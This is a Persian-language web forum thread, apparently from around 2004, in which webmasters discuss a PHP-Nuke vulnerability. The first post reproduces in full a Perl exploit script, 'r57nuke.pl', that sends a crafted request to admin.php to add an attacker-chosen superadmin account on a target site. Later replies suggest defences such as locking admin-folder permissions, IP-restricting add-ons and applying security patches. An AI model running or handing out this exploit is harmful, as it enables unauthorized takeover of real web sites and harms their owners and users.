سايت هاي نوك به اين روش هك ميشن مهم مهم مهم

ALICIVIL

کاربر تازه وارد
تاریخ عضویت
4 ژانویه 2004
نوشته‌ها
43
لایک‌ها
1
در سايت مجيد آنلاين هم اين مطلب رو نوشتم. لطفا حد اقل شما ها به فكر چاره باشيد .

دوستان عزيز سلام
همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره
يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت..........

اين نوع هك با استفاده ار SQL Injection انجام ميشه
اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك

#!/usr/bin/perl
# * r57nuke.pl *
# * php-nuke all versions and spaiz-nuke version < 1.2beta xploit *

use IO::Socket;


print "Enter host (e.g. www.phpnuke.com): \r\n";
chomp($server=<STDIN>);
# get new admin nick =)
print "Enter u nick (e.g. hacker): \r\n";
chomp($nick=<STDIN>);
# get new admin pass =)
print "Enter u pass (e.g. password): \r\n";
chomp($pass=<STDIN>);
# get admin hash =)
print "Enter hash (e.g. YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6): \r\n";
chomp($hash=<STDIN>);

$port="80";

$path="/admin.php?op=AddAuthor&add_radminsuper=1&add_name=$nick&add_aid=$nick&[email protected]&add_pwd=$pass&admin=$hash";

print "\r\nConnecting... ";

$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Photo => tcp)
or die;

print "OK \r\n";
print "exploiting... ";

# send string to server

print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Referer: $server/admin.php\n";
print $socket "User-Agent: r57spaiz\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "OK \r\n";
print "now u can go to $server/admin.php and just use login $nick and password $pass for access \r\n
 

Acaro

کاربر تازه وارد
تاریخ عضویت
14 نوامبر 2003
نوشته‌ها
75
لایک‌ها
6
سن
43
به نقل از ALICIVIL :
در سايت مجيد آنلاين هم اين مطلب رو نوشتم. لطفا حد اقل شما ها به فكر چاره باشيد .

دوستان عزيز سلام
همه سايتهاي نوشته شده با ن.ك به اين اكسپلويت جواب ميدن فكر كنم با اين حساب اين سيستم به درد خاله فرانسيسكو بارزي بخوره
يك فايل پرل ميتونه پسورد ادمين رو بيرون بكشه ... خيلي راحت..........

اين نوع هك با استفاده ار SQL Injection انجام ميشه
اين هم فايل پرلش اگه ميتونيد روش كار كنيد اينم ضعف سيستم نوك
سلام مجدد

علي جان ... حالا نميدونم كه اين Exploit واقعا ميتونه اينكار رو انجام بده يا نه ... ولي خوب فرض رو بر اين ميذاريم كه ميتونه ... همونطوري هم كه تو مبحث " حفره نوك " گفتم ... به نظر من بهترين راهش اينه كه فايل و پوشه ادمين رو ما بعد از اينكه كار روزانه مون تموم شد سطح دسترسي به اون رو رو 700 ست كنيم ... حالا اگه پسورد رو هم در آوردن ... 1- نميتونن وارد منو مدير بشن و زماني كه به log فايل ها نگاه كني مي فهمي كه كي ميخواسته به سيستم مديريت وارد شه 2-اونقدر هم بيكار نيستن كه هر 5 دقيقه يكبار چك كنن ببينن ما كي سطح دسترسي اون رو تغيير ميديم تا بيان وارد سيستم بشن ... البته قبول دارم يكم سخته و تازه فقط براي سايت هايي است كه فقط 1 مدير دارند ...
را دوم هم .. استفاده از Addon كه معرفي كردم است (System Protector ) اونطوري فقط سيستم اجازه ورود به منو مديريت را با IP يا IP هاي تعريف شده را ميده .. در ضمن هر كاربري كه مياد و زيادي فضولي تو سايت ميكنه ... منظورم اينه كه URL هاي نامتعارف وارد ميكنه رو شناسايي و Ban ميكنه ...

من فكر كنم دومين راه حل معقول تره

موفق باشي
 

ALICIVIL

کاربر تازه وارد
تاریخ عضویت
4 ژانویه 2004
نوشته‌ها
43
لایک‌ها
1
سلام علي جان ...آقا با اي دي ياهو من در تماس باش... (OLD_ALICIVIL) البته اگه خوابم نبره سعي ميكنم زود زود به سايت سر بزنم... مكر ميكنم كه بتونيم يه را حل خوب پيدا بكنيم فقط بچه ها نظراتشون رو بنويسن.....اينطوري زود تر به نتيجه ميرسيم....اگه همه با هم همفكري بكنند زياد طول نميكشه ...
:ph34r: اين هم خطاب به جناب هكر عزيز === زياد به خودتون نباليد شما حتي نمي تونيد 2 سطر از اين اسكريپتهايي كه باهاش كار ميكنيد رو بنويسيد بلكه دارين از تبحر و استعداد يه عده ديگه كه هدفشون نمايش ضعف هاي سيستم بوده سو’ استفاده ميكنيد. به اميد ديدار............
 

ali

کاربر تازه وارد
تاریخ عضویت
18 دسامبر 2002
نوشته‌ها
1,101
لایک‌ها
11
سن
34
محل سکونت
tehran
دقيقا حرف دلهع منو داري ميزني ! آخه اگه يه سايت ديگه كه سيستمش نوك نبود روهك كرده بودن دلم نمي سوخت مي گفتم يه چيزي بارشونه !
 

knowhow

مدیران قدیمی
تاریخ عضویت
25 دسامبر 2002
نوشته‌ها
3,477
لایک‌ها
21
خود سايت نوك در اين رابطه چيزي ننوشته !؟
معمولا يك سري پچ مي ده كه مشكلات امنيتي رو حل مي كنه !!
 

usgroup1

کاربر تازه وارد
تاریخ عضویت
28 می 2003
نوشته‌ها
137
لایک‌ها
1
در مورد سيستم هاي opern source مثل phpnuke بايد حتما هميشه مثل خود هكر ها دنبال ضعف هاي امنيتي تازه كشف شده و پچ هاش باشي و هي سايتو update كني اين سايت رو ببينين هميشه سريع پچ هاي امنيتي رو ميزاره براي سوراخ هاي جديد : http://www.nukecops.com

در ضمن همينجا بگم كه اونايي كه سايت nuke ورژن 6.5 داشتن و هك شده و نميتونن راحت اطلاعات رو به نسخه 7 update كنن من يه نسخه 6.5 امن دارم كه خودم فارسيش كردم با آخرين پچ هاي امنيتي (احتمالا :hmm: ) اگر مي خواين با من تماس بگيريد اينم يه دمو ازش http://www.persianboard.com
 
بالا